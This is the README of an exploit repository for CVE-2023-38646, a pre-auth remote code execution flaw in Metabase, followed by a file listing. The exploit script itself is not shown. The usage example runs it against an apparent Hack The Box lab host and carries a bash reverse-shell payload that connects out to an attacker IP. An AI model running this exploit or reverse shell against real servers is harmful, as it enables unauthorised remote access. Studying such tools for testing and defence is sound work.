Exploit for CVE-2023-38646, a pre-auth RCE in Metbase# CVE-2023-38646
An exploit for CVE-2023-38646, a pre-auth RCE in Metabase open-source edition < 0.46.6.1 and Metabase enterprise edition < 1.46.6.1.
# Usage
You can use the exploit as follows:
```bash
python3 ./cve_2023-38646.py -t http://data.analytical.htb -c '/bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'
```
# Disclaimer
This is a tool for assessing your companies exposure to CVE-2023-38646, I am not response for any illegal or irresponsible usage of this code.
For educational purposes only!
[4.0K] /data/pocs/b6f04501ebd2d5ced4cbd30a6345ae89115ad4fb
├── [3.7K] cve_2023-38646.py
└── [ 508] README.md
0 directories, 2 files